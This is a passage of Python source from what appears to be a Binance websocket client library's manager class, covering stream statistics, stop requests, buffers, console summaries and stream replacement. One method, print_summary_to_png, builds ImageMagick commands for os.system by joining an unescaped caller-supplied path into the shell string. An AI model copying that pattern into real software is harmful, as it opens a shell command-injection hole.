self.stream_list[stream_id]['receives_statistic_last_second']['entries'][current_timestamp] = 1
with self.total_receives_lock:
self.total_receives += 1
def increase_reconnect_counter(self, stream_id):
"""
Increase reconnect counter
:param stream_id: id of a stream
:type stream_id: str
"""
self.stream_list[stream_id]['logged_reconnects'].append(time.time())
self.stream_list[stream_id]['reconnects'] += 1
with self.reconnects_lock:
self.reconnects += 1
def increase_transmitted_counter(self, stream_id):
"""
Increase the counter of transmitted payloads
:param stream_id: id of a stream
:type stream_id: str
"""
self.stream_list[stream_id]['processed_transmitted_total'] += 1
with self.total_transmitted_lock:
self.total_transmitted += 1
def is_manager_stopping(self):
"""
Returns `True` if the manager has a stop request, 'False' if not.
:return: bool
"""
if self.stop_manager_request is None:
return False
else:
return True
def is_exchange_type(self, exchange_type=False):
"""
Check the exchange type!
:param exchange_type: Valid types are `dex` and `cex`!
:type exchange_type: str
:return: bool
"""
if exchange_type is False:
return False
if self.exchange == "binance.org" or \
self.exchange == "binance.org-testnet":
is_type = "dex"
elif self.exchange == "binance.com" or \
self.exchange == "binance.com-testnet" or \
self.exchange == "binance.com-margin" or \
self.exchange == "binance.com-margin-testnet" or \
self.exchange == "binance.com-isolated_margin" or \
self.exchange == "binance.com-isolated_margin-testnet" or \
self.exchange == "binance.com-futures" or \
self.exchange == "binance.com-futures-testnet" or \
self.exchange == "binance.com-coin-futures" or \
self.exchange == "binance.com-coin_futures" or \
self.exchange == "binance.je" or \
self.exchange == "binance.us" or \
self.exchange == "trbinance.com" or \
self.exchange == "jex.com":
is_type = "cex"
else:
logger.critical(f"BinanceWebSocketApiManager.is_exchange_type() - Can not determine exchange type for "
f"exchange={str(self.exchange)}")
return False
if is_type == exchange_type:
return True
else:
return False
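# Usage sketch (illustrative comment, assuming a manager instance `ubwa`):
#
#     if ubwa.is_exchange_type("dex"):
#         print("binance.org style websockets")
#     elif ubwa.is_exchange_type("cex"):
#         print("binance.com style websockets")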
def is_stop_request(self, stream_id, exclude_kill_requests=False):
"""
Does a specific stream have a stop_request?
:param stream_id: id of a stream
:type stream_id: str
:param exclude_kill_requests: if `True` this method returns `False` on kill_requests
:type exclude_kill_requests: bool
:return: bool
"""
logger.debug(f"BinanceWebSocketApiManager.is_stop_request({stream_id}){self.get_debug_log()}")
try:
if self.stream_list[stream_id]['stop_request'] is True:
return True
elif self.is_manager_stopping():
return True
elif self.stream_list[stream_id]['kill_request'] is True and exclude_kill_requests is False:
return True
else:
return False
except KeyError:
return False
def is_stop_as_crash_request(self, stream_id):
"""
Does a specific stream have a stop_as_crash_request?
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
logger.debug(f"BinanceWebSocketApiManager.is_stop_as_crash_request({stream_id}){self.get_debug_log()}")
try:
if self.stream_list[stream_id]['crash_request'] is True:
return True
except KeyError:
pass
if self.is_manager_stopping():
return True
else:
return False
def is_stream_signal_buffer_enabled(self):
"""
Is the stream_signal_buffer enabled?
:return: bool
"""
return self.enable_stream_signal_buffer
def is_update_available(self):
"""
Is a new release of this package available?
:return: bool
"""
installed_version = self.get_version()
if ".dev" in installed_version:
installed_version = installed_version[:-4]
if self.get_latest_version() == installed_version:
return False
elif self.get_latest_version() == "unknown":
return False
else:
return True
def is_update_availabe_unicorn_fy(self):
"""
Is a new release of `UnicornFy <https://github.com/LUCIT-Systems-and-Development/unicorn-fy>`_ available?
:return: bool
"""
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
return unicorn_fy.is_update_available()
def is_update_availabe_check_command(self, check_command_version=False):
"""
Is a new release of `check_lucit_collector.py` available?
:return: bool
"""
installed_version = check_command_version
latest_version = self.get_latest_version_check_command()
if ".dev" in str(installed_version):
installed_version = installed_version[:-4]
if latest_version == installed_version:
return False
elif latest_version == "unknown":
return False
else:
return True
def kill_stream(self, stream_id):
"""
Kill a specific stream
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
# kill a specific stream by stream_id
logger.debug(f"BinanceWebSocketApiManager.kill_stream({stream_id}){self.get_debug_log()}")
try:
loop = self.get_event_loop_by_stream_id(stream_id)
try:
if loop.is_running():
logger.debug(f"BinanceWebSocketApiManager.kill_stream({stream_id}) - Closing event_loop "
f"of stream_id {stream_id}")
loop.close()
except AttributeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.kill_stream({stream_id}) - AttributeError - {error_msg}")
except RuntimeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.kill_stream({stream_id}) - RuntimeError - {error_msg}")
except RuntimeWarning as error_msg:
logger.debug(f"BinanceWebSocketApiManager.kill_stream({stream_id}) - RuntimeWarning - {error_msg}")
return True
def pop_stream_data_from_stream_buffer(self, stream_buffer_name=False, mode="FIFO"):
"""
Get oldest or latest entry from
`stream_buffer <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
and remove from FIFO/LIFO stack.
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:param mode: How to read from the `stream_buffer` - "FIFO" (default) or "LIFO".
:type mode: str
:return: stream_data - str, dict or False
"""
if stream_buffer_name is False:
try:
with self.stream_buffer_lock:
if mode.upper() == "FIFO":
stream_data = self.stream_buffer.popleft()
elif mode.upper() == "LIFO":
stream_data = self.stream_buffer.pop()
else:
return False
return stream_data
except IndexError:
return False
else:
try:
with self.stream_buffer_locks[stream_buffer_name]:
if mode.upper() == "FIFO":
stream_data = self.stream_buffers[stream_buffer_name].popleft()
elif mode.upper() == "LIFO":
stream_data = self.stream_buffers[stream_buffer_name].pop()
else:
return False
return stream_data
except IndexError:
return False
except KeyError:
return False
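# Usage sketch (illustrative comment) of a typical stream_buffer consumer loop, assuming a manager
# instance `ubwa` and a hypothetical callback `process()` of your own:
#
#     while True:
#         data = ubwa.pop_stream_data_from_stream_buffer()
#         if data is False:
#             time.sleep(0.01)
#         else:
#             process(data)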
def pop_stream_signal_from_stream_signal_buffer(self):
"""
Get oldest entry from
`stream_signal_buffer <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
and remove from stack/pipe (FIFO stack)
:return: stream_signal - dict or False
"""
try:
with self.stream_signal_buffer_lock:
stream_signal = self.stream_signal_buffer.popleft()
return stream_signal
except IndexError:
return False
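# Usage sketch (illustrative comment, assuming a manager instance `ubwa` created with
# enable_stream_signal_buffer=True; the exact keys of the signal dict depend on the version):
#
#     signal = ubwa.pop_stream_signal_from_stream_signal_buffer()
#     if signal is not False:
#         print(signal)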
def print_stream_info(self, stream_id, add_string="", title=None):
"""
Print all info about a specific stream, helps debugging :)
:param stream_id: id of a stream
:type stream_id: str
:param add_string: text to add to the output
:type add_string: str
:param title: set a title (first row) for print_stream_info output
:type title: str
:return: bool
"""
restart_requests_row = ""
binance_api_status_row = ""
stream_label_row = ""
status_row = ""
payload_row = ""
symbol_row = ""
dex_user_address_row = ""
last_static_ping_listen_key = ""
stream_info = self.get_stream_info(stream_id)
stream_row_color_prefix = ""
stream_row_color_suffix = ""
if len(add_string) > 0:
add_string = " " + str(add_string) + "\r\n"
try:
if len(self.stream_list[stream_id]['logged_reconnects']) > 0:
logged_reconnects_row = "\r\n logged_reconnects: "
row_prefix = ""
for timestamp in self.stream_list[stream_id]['logged_reconnects']:
logged_reconnects_row += row_prefix + \
datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC')
row_prefix = ", "
else:
logged_reconnects_row = ""
except KeyError:
return False
if "running" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[32m"
stream_row_color_suffix = "\033[0m\r\n"
for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
if (time.time() - reconnect_timestamp) < 2:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "crashed" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "restarting" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "stopped" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
try:
if self.restart_requests[stream_id]['status']:
restart_requests_row = " restart_request: " + self.restart_requests[stream_id]['status'] + "\r\n"
except KeyError:
pass
if self.stream_list[stream_id]['markets'] == "!userData":
last_static_ping_listen_key = " last_static_ping_listen_key: " + \
str(self.stream_list[stream_id]['last_static_ping_listen_key']) + "\r\n"
if self.binance_api_status['status_code'] == 200:
binance_api_status_code = str(self.binance_api_status['status_code'])
elif self.binance_api_status['status_code'] == 418:
binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + "\033[0m"
else:
binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + "\033[0m"
binance_api_status_row = " binance_api_status: used_weight=" + str(self.binance_api_status['weight']) + \
", status_code=" + str(binance_api_status_code) + " (last update " + \
str(datetime.utcfromtimestamp(
self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
")\r\n"
current_receiving_speed = str(self.get_human_bytesize(self.get_current_receiving_speed(stream_id), "/s"))
if self.stream_list[stream_id]['symbols'] is not False:
symbol_row = " symbols:" + str(stream_info['symbols']) + "\r\n"
if self.stream_list[stream_id]["payload"]:
payload_row = " payload: " + str(self.stream_list[stream_id]["payload"]) + "\r\n"
if self.stream_list[stream_id]["dex_user_address"] is not False:
dex_user_address_row = " user_address: " + str(self.stream_list[stream_id]["dex_user_address"]) + "\r\n"
if self.stream_list[stream_id]["stream_label"] is not None:
stream_label_row = " stream_label: " + self.stream_list[stream_id]["stream_label"] + "\r\n"
if isinstance(stream_info['ping_interval'], int):
ping_interval = f"{stream_info['ping_interval']} seconds"
else:
ping_interval = stream_info['ping_interval']
if isinstance(stream_info['ping_timeout'], int):
ping_timeout = f"{stream_info['ping_timeout']} seconds"
else:
ping_timeout = stream_info['ping_timeout']
if isinstance(stream_info['close_timeout'], int):
close_timeout = f"{stream_info['close_timeout']} seconds"
else:
close_timeout = stream_info['close_timeout']
if title:
first_row = str(self.fill_up_space_centered(96, f" {title} ", "=")) + "\r\n"
last_row = str(self.fill_up_space_centered(96, f" Powered by {self.get_user_agent()} ", "=")) + "\r\n"
else:
first_row = str(self.fill_up_space_centered(96, f"{self.get_user_agent()} ", "=")) + "\r\n"
last_row = "========================================================================================" \
"=======\r\n"
try:
uptime = self.get_human_uptime(stream_info['processed_receives_statistic']['uptime'])
print(first_row +
" exchange:", str(self.stream_list[stream_id]['exchange']), "\r\n" +
str(add_string) +
" stream_id:", str(stream_id), "\r\n" +
str(stream_label_row) +
" stream_buffer_maxlen:", str(stream_info['stream_buffer_maxlen']), "\r\n" +
" channels (" + str(len(stream_info['channels'])) + "):", str(stream_info['channels']), "\r\n" +
" markets (" + str(len(stream_info['markets'])) + "):", str(stream_info['markets']), "\r\n" +
str(symbol_row) +
" subscriptions: " + str(self.stream_list[stream_id]['subscriptions']) + "\r\n" +
str(payload_row) +
str(status_row) +
str(dex_user_address_row) +
f" ping_interval: {ping_interval}\r\n"
f" ping_timeout: {ping_timeout}\r\n"
f" close_timeout: {close_timeout}\r\n"
" start_time:", str(stream_info['start_time']), "\r\n"
" uptime:", str(uptime),
"since " + str(
datetime.utcfromtimestamp(stream_info['start_time']).strftime('%Y-%m-%d, %H:%M:%S UTC')) +
"\r\n" +
" reconnects:", str(stream_info['reconnects']), logged_reconnects_row, "\r\n" +
str(restart_requests_row) +
str(binance_api_status_row) +
str(last_static_ping_listen_key) +
" last_heartbeat:", str(stream_info['last_heartbeat']), "\r\n"
" seconds_to_last_heartbeat:", str(stream_info['seconds_to_last_heartbeat']), "\r\n"
" kill_request:", str(stream_info['kill_request']), "\r\n"
" stop_request:", str(stream_info['stop_request']), "\r\n"
" has_stopped:", str(stream_info['has_stopped']), "\r\n"
" seconds_since_has_stopped:",
str(stream_info['seconds_since_has_stopped']), "\r\n"
" current_receiving_speed:", str(current_receiving_speed), "\r\n" +
" processed_receives:", str(stream_info['processed_receives_total']), "\r\n" +
" transmitted_payloads:", str(self.stream_list[stream_id]['processed_transmitted_total']), "\r\n" +
" stream_most_receives_per_second:",
str(stream_info['receives_statistic_last_second']['most_receives_per_second']), "\r\n"
" stream_receives_per_second:",
str(stream_info['processed_receives_statistic']['stream_receives_per_second'].__round__(3)), "\r\n"
" stream_receives_per_minute:",
str(stream_info['processed_receives_statistic']['stream_receives_per_minute'].__round__(3)), "\r\n"
" stream_receives_per_hour:",
str(stream_info['processed_receives_statistic']['stream_receives_per_hour'].__round__(3)), "\r\n"
" stream_receives_per_day:",
str(stream_info['processed_receives_statistic']['stream_receives_per_day'].__round__(3)), "\r\n" +
last_row)
except KeyError:
self.print_stream_info(stream_id)
def print_summary(self, add_string="", disable_print=False, title=None):
"""
Print an overview of all streams
:param add_string: text to add to the output
:type add_string: str
:param disable_print: set to `True` to use curses instead of print()
:type disable_print: bool
:param title: set a title (first row) for print_summary output
:type title: str
"""
streams = len(self.stream_list)
active_streams = 0
crashed_streams = 0
restarting_streams = 0
stopped_streams = 0
active_streams_row = ""
restarting_streams_row = ""
stopped_streams_row = ""
all_receives_per_second = 0.0
current_receiving_speed = 0
streams_with_stop_request = 0
stream_rows = ""
crashed_streams_row = ""
binance_api_status_row = ""
received_bytes_per_x_row = ""
streams_with_stop_request_row = ""
stream_buffer_row = ""
highest_receiving_speed_row = f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} " \
f"(reached at " \
f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])})"
if len(add_string) > 0:
add_string = " " + str(add_string) + "\r\n"
try:
temp_stream_list = copy.deepcopy(self.stream_list)
except RuntimeError:
return ""
except TypeError:
return ""
for stream_id in temp_stream_list:
stream_row_color_prefix = ""
stream_row_color_suffix = ""
current_receiving_speed += self.get_current_receiving_speed(stream_id)
stream_statistic = self.get_stream_statistic(stream_id)
if self.stream_list[stream_id]['status'] == "running":
active_streams += 1
all_receives_per_second += stream_statistic['stream_receives_per_second']
try:
if self.restart_requests[stream_id]['status'] == "restarted":
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
except KeyError:
pass
try:
for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
if (time.time() - reconnect_timestamp) < 1:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
elif (time.time() - reconnect_timestamp) < 2:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif (time.time() - reconnect_timestamp) < 4:
stream_row_color_prefix = "\033[1m\033[32m"
stream_row_color_suffix = "\033[0m"
except KeyError:
pass
elif self.stream_list[stream_id]['status'] == "stopped":
stopped_streams += 1
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif self.stream_list[stream_id]['status'] == "restarting":
restarting_streams += 1
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif "crashed" in self.stream_list[stream_id]['status']:
crashed_streams += 1
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
if self.stream_list[stream_id]['stream_label'] is not None:
if len(self.stream_list[stream_id]['stream_label']) > 18:
stream_label = str(self.stream_list[stream_id]['stream_label'])[:13] + "..."
else:
stream_label = str(self.stream_list[stream_id]['stream_label'])
else:
stream_label = str(self.stream_list[stream_id]['stream_label'])
stream_rows += stream_row_color_prefix + str(stream_id) + stream_row_color_suffix + " |" + \
self.fill_up_space_right(17, stream_label) + "|" + \
self.fill_up_space_left(8, self.get_stream_receives_last_second(stream_id)) + "|" + \
self.fill_up_space_left(11, stream_statistic['stream_receives_per_second'].__round__(2)) + "|" + \
self.fill_up_space_left(8, self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']) \
+ "|" + stream_row_color_prefix + \
self.fill_up_space_left(8, len(self.stream_list[stream_id]['logged_reconnects'])) + \
stream_row_color_suffix + "\r\n "
if self.is_stop_request(stream_id, exclude_kill_requests=True) is True and \
self.stream_list[stream_id]['status'] == "running":
streams_with_stop_request += 1
if streams_with_stop_request >= 1:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
streams_with_stop_request_row = stream_row_color_prefix + " streams_with_stop_request: " + \
str(streams_with_stop_request) + stream_row_color_suffix + "\r\n"
if crashed_streams >= 1:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
crashed_streams_row = stream_row_color_prefix + " crashed_streams: " + str(crashed_streams) \
+ stream_row_color_suffix + "\r\n"
total_received_bytes = str(self.get_total_received_bytes()) + " (" + str(
self.get_human_bytesize(self.get_total_received_bytes())) + ")"
try:
received_bytes_per_second = self.get_total_received_bytes() / (time.time() - self.start_time)
received_bytes_per_x_row += str(self.get_human_bytesize(received_bytes_per_second, '/s')) + " (per day " + \
str(((received_bytes_per_second / 1024 / 1024 / 1024) * 60 * 60 * 24).__round__(2))\
+ " gB)"
if self.get_stream_buffer_length() > 50:
stream_row_color_prefix = "\033[1m\033[34m"
stream_row_color_suffix = "\033[0m"
stream_buffer_row += stream_row_color_prefix + " stream_buffer_stored_items: " + \
str(self.get_stream_buffer_length()) + "\r\n"
stream_buffer_row += " stream_buffer_byte_size: " + str(self.get_stream_buffer_byte_size()) + \
" (" + str(self.get_human_bytesize(self.get_stream_buffer_byte_size())) + ")" + \
stream_row_color_suffix + "\r\n"
if active_streams > 0:
active_streams_row = " \033[1m\033[32mactive_streams: " + str(active_streams) + "\033[0m\r\n"
if restarting_streams > 0:
restarting_streams_row = " \033[1m\033[33mrestarting_streams: " + str(restarting_streams) + "\033[0m\r\n"
if stopped_streams > 0:
stopped_streams_row = " \033[1m\033[33mstopped_streams: " + str(stopped_streams) + "\033[0m\r\n"
if self.binance_api_status['weight'] is not None:
if self.binance_api_status['status_code'] == 200:
binance_api_status_code = str(self.binance_api_status['status_code'])
elif self.binance_api_status['status_code'] == 418:
binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + \
"\033[0m"
else:
binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + \
"\033[0m"
binance_api_status_row = " binance_api_status: used_weight=" + \
str(self.binance_api_status['weight']) + \
", status_code=" + str(binance_api_status_code) + " (last update " + \
str(datetime.utcfromtimestamp(
self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
")\r\n"
if title:
first_row = str(self.fill_up_space_centered(96, f" {title} ", "=")) + "\r\n"
last_row = str(self.fill_up_space_centered(96, f" Powered by {self.get_user_agent()} ", "=")) + "\r\n"
else:
first_row = str(self.fill_up_space_centered(96, f"{self.get_user_agent()} ", "=")) + "\r\n"
last_row = "========================================================================================" \
"=======\r\n"
try:
print_text = (
first_row +
" exchange: " + str(self.stream_list[stream_id]['exchange']) + "\r\n" +
" uptime: " + str(self.get_human_uptime(time.time() - self.start_time)) + " since " +
str(self.get_date_of_timestamp(self.start_time)) + "\r\n" +
" streams: " + str(streams) + "\r\n" +
str(active_streams_row) +
str(crashed_streams_row) +
str(restarting_streams_row) +
str(stopped_streams_row) +
str(streams_with_stop_request_row) +
" subscriptions: " + str(self.get_number_of_all_subscriptions()) + "\r\n" +
str(stream_buffer_row) +
" current_receiving_speed: " + str(self.get_human_bytesize(current_receiving_speed, "/s")) + "\r\n" +
" average_receiving_speed: " + str(received_bytes_per_x_row) + "\r\n" +
" highest_receiving_speed: " + str(highest_receiving_speed_row) + "\r\n" +
" total_receives: " + str(self.total_receives) + "\r\n"
" total_received_bytes: " + str(total_received_bytes) + "\r\n"
" total_transmitted_payloads: " + str(self.total_transmitted) + "\r\n" +
" stream_buffer_maxlen: " + str(self.stream_buffer_maxlen) + "\r\n" +
str(binance_api_status_row) +
" process_ressource_usage: cpu=" + str(self.get_process_usage_cpu()) + "%, memory=" +
str(self.get_process_usage_memory()) + ", threads=" + str(self.get_process_usage_threads()) +
"\r\n" + str(add_string) +
" ---------------------------------------------------------------------------------------------\r\n"
" stream_id | stream_label | last | average | peak | recon\r\n"
" ---------------------------------------------------------------------------------------------\r\n"
" " + str(stream_rows) +
"---------------------------------------------------------------------------------------------\r\n"
" all_streams |" +
self.fill_up_space_left(8, self.get_all_receives_last_second()) + "|" +
self.fill_up_space_left(11, all_receives_per_second.__round__(2)) + "|" +
self.fill_up_space_left(8, self.most_receives_per_second) + "|" +
self.fill_up_space_left(8, self.reconnects) + "\r\n" +
last_row
)
if disable_print:
            if sys.platform.startswith('win'):
print_text = self.remove_ansi_escape_codes(print_text)
return print_text
else:
print(print_text)
except UnboundLocalError:
pass
except ZeroDivisionError:
pass
def print_summary_to_png(self, print_summary_export_path, hight_per_row=12.5):
"""
Create a PNG image file with the console output of `print_summary()`
*LINUX ONLY* It should not be hard to make it OS independent:
https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/issues/61
:param print_summary_export_path: If you want to export the output of print_summary() to an image,
please provide a path like "/var/www/html/". `View the Wiki!
<https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/How-to-export-print_summary()-stdout-to-PNG%3F>`_
:type print_summary_export_path: str
        :param hight_per_row: set the height per row for the image height calculation
        :type hight_per_row: int or float
:return: bool
"""
print_text = self.print_summary(disable_print=True)
# Todo:
# 1. Handle paths right
# 2. Use PythonMagick instead of Linux ImageMagick
with open(print_summary_export_path + "print_summary.txt", 'w') as text_file:
print(self.remove_ansi_escape_codes(print_text), file=text_file)
try:
image_hight = print_text.count("\n") * hight_per_row + 15
except AttributeError:
return False
os.system('convert -size 720x' + str(image_hight) + ' xc:black -font "FreeMono" -pointsize 12 -fill white -annotate '
'+30+30 "@' + print_summary_export_path + 'print_summary.txt' + '" ' +
print_summary_export_path + 'print_summary_plain.png')
os.system('convert ' + print_summary_export_path + 'print_summary_plain.png -font "FreeMono" '
'-pointsize 12 -fill red -undercolor \'#00000080\' -gravity North -annotate +0+5 '
'"$(date)" ' + print_summary_export_path + 'print_summary.png')
return True
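    # Illustrative usage sketch, assuming `ubwa` is a running BinanceWebSocketApiManager
    # instance and ImageMagick's `convert` command is available on the (Linux) host:
    #
    #   ubwa.print_summary_to_png("/var/www/html/")
    #
    # This writes `print_summary.txt`, `print_summary_plain.png` and the final
    # `print_summary.png` into the given directory.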
@staticmethod
def remove_ansi_escape_codes(text):
"""
        Remove ANSI escape codes from the text string!
:param text: str
:return:
"""
text = str(text)
text = text.replace("\033[1m\033[31m", "")
text = text.replace("\033[1m\033[32m", "")
text = text.replace("\033[1m\033[33m", "")
text = text.replace("\033[1m\033[34m", "")
text = text.replace("\033[0m", "")
return text
def replace_stream(self,
stream_id,
new_channels,
new_markets,
new_stream_label=None,
new_stream_buffer_name=False,
new_api_key=False,
new_api_secret=False,
new_symbols=False,
new_output="raw_data",
new_ping_interval=20,
new_ping_timeout=20,
new_close_timeout=10,
new_stream_buffer_maxlen=None):
"""
Replace a stream
        If you want to start a stream with a new config, it is recommended to first start a new stream with the new
        settings and to close the old stream only after the new stream has received its first data. This keeps your
        data consistent.
:param stream_id: id of the old stream
:type stream_id: str
:param new_channels: the new channel list for the stream
:type new_channels: str, tuple, list, set
:param new_markets: the new markets list for the stream
:type new_markets: str, tuple, list, set
:param new_stream_label: provide a stream_label to identify the stream
:type new_stream_label: str
:param new_stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type new_stream_buffer_name: bool or str
:param new_api_key: provide a valid Binance API key
:type new_api_key: str
:param new_api_secret: provide a valid Binance API secret
:type new_api_secret: str
:param new_symbols: provide the symbols for isolated_margin user_data streams
:type new_symbols: str
:param new_output: set to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to convert
with `UnicornFy <https://github.com/LUCIT-Systems-and-Development/unicorn-fy>`_ - otherwise the output
remains unchanged and gets delivered as received from the endpoints
:type new_output: str
:param new_ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_ping_interval: int or None
:param new_ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_ping_timeout: int or None
:param new_close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_close_timeout: int or None
:param new_stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
                                         `stream_buffer`. The generic `stream_buffer` always uses the value of
`BinanceWebSocketApiManager()`.
:type new_stream_buffer_maxlen: int or None
:return: new_stream_id or 'False'
"""
        # start a new socket and stop the old stream only after the new stream has received its first record
new_stream_id = self.create_stream(new_channels,
new_markets,
new_stream_label,
new_stream_buffer_name,
new_api_key,
new_api_secret,
new_symbols,
new_output,
new_ping_interval,
new_ping_timeout,
new_close_timeout,
new_stream_buffer_maxlen)
if self.wait_till_stream_has_started(new_stream_id):
self.stop_stream(stream_id)
return new_stream_id
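    # Illustrative usage sketch, assuming `ubwa` is a BinanceWebSocketApiManager instance
    # and `old_stream_id` is the id of a running stream; the channel and market names are
    # examples only:
    #
    #   new_stream_id = ubwa.replace_stream(old_stream_id,
    #                                       new_channels=['trade', 'kline_1m'],
    #                                       new_markets=['btcusdt', 'ethusdt'],
    #                                       new_stream_label="replacement")
    #
    # The old stream is stopped only after the new stream has received its first record.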
def run(self):
"""
        This method overrides `threading.Thread.run()` and starts the management threads
"""
thread_frequent_checks = threading.Thread(target=self._frequent_checks, name="frequent_checks")
thread_frequent_checks.start()
thread_keepalive_streams = threading.Thread(target=self._keepalive_streams, name="keepalive_streams")
thread_keepalive_streams.start()
def set_private_dex_config(self, binance_dex_user_address):
"""
Set binance_dex_user_address
        This becomes the default user_address; once the websocket is created with this default value, it is not possible
        to change it. If you plan to use different user_addresses, it is recommended not to use this method! Just provide
        the user_address in the market parameter of create_stream().
:param binance_dex_user_address: Binance DEX user address
:type binance_dex_user_address: str
"""
self.dex_user_address = binance_dex_user_address
def set_heartbeat(self, stream_id):
"""
Set heartbeat for a specific thread (should only be done by the stream itself)
"""
logger.debug("BinanceWebSocketApiManager.set_heartbeat(" + str(stream_id) + ")")
try:
self.stream_list[stream_id]['last_heartbeat'] = time.time()
self.stream_list[stream_id]['status'] = "running"
except KeyError:
pass
def set_ringbuffer_error_max_size(self, max_size):
"""
How many error messages should be kept in the ringbuffer?
:param max_size: Max entries of error messages in the ringbuffer.
:type max_size: int
:return: bool
"""
self.ringbuffer_error_max_size = int(max_size)
def set_ringbuffer_result_max_size(self, max_size):
"""
How many result messages should be kept in the ringbuffer?
:param max_size: Max entries of result messages in the ringbuffer.
:type max_size: int
:return: bool
"""
self.ringbuffer_result_max_size = int(max_size)
def set_socket_is_not_ready(self, stream_id: str) -> None:
"""
Set `socket_is_ready` for a specific stream to False.
:param stream_id: id of the stream
:type stream_id: str
"""
logger.debug(f"BinanceWebSocketApiManager.set_socket_is_not_ready({stream_id}){self.get_debug_log()}")
self.socket_is_ready[stream_id] = False
def set_socket_is_ready(self, stream_id: str) -> None:
"""
Set `socket_is_ready` for a specific stream to True.
:param stream_id: id of the stream
:type stream_id: str
"""
logger.debug(f"BinanceWebSocketApiManager.set_socket_is_ready({stream_id}){self.get_debug_log()}")
self.socket_is_ready[stream_id] = True
def set_stream_label(self, stream_id, stream_label=None):
"""
Set a stream_label by stream_id
:param stream_id: id of the stream
:type stream_id: str
:param stream_label: stream_label to set
:type stream_label: str
"""
self.stream_list[stream_id]['stream_label'] = stream_label
def set_keep_max_received_last_second_entries(self, number_of_max_entries):
"""
        Set how many received_last_second entries are stored before they get deleted!
:param number_of_max_entries: number of entries to keep in list
:type number_of_max_entries: int
"""
self.keep_max_received_last_second_entries = number_of_max_entries
def set_restart_request(self, stream_id):
"""
Set a restart request for a specific stream
:param stream_id: id of the old stream
:type stream_id: str
"""
logger.debug(f"BinanceWebSocketApiManager.set_restart_request({stream_id}){self.get_debug_log()}")
try:
if self.restart_requests[stream_id]['last_restart_time'] + self.restart_timeout > time.time():
logger.debug(f"BinanceWebSocketApiManager.set_restart_request() - last_restart_time timeout, "
f"initiate new")
return False
except KeyError:
pass
logger.debug(f"BinanceWebSocketApiManager.set_restart_request() - creating new request")
self.restart_requests[stream_id] = {'status': "new",
'initiated': None}
return True
def split_payload(self, params, method, max_items_per_request=350):
"""
        Sending more than 8000 chars via websocket.send() leads to a connection loss; 350 list elements is a good limit
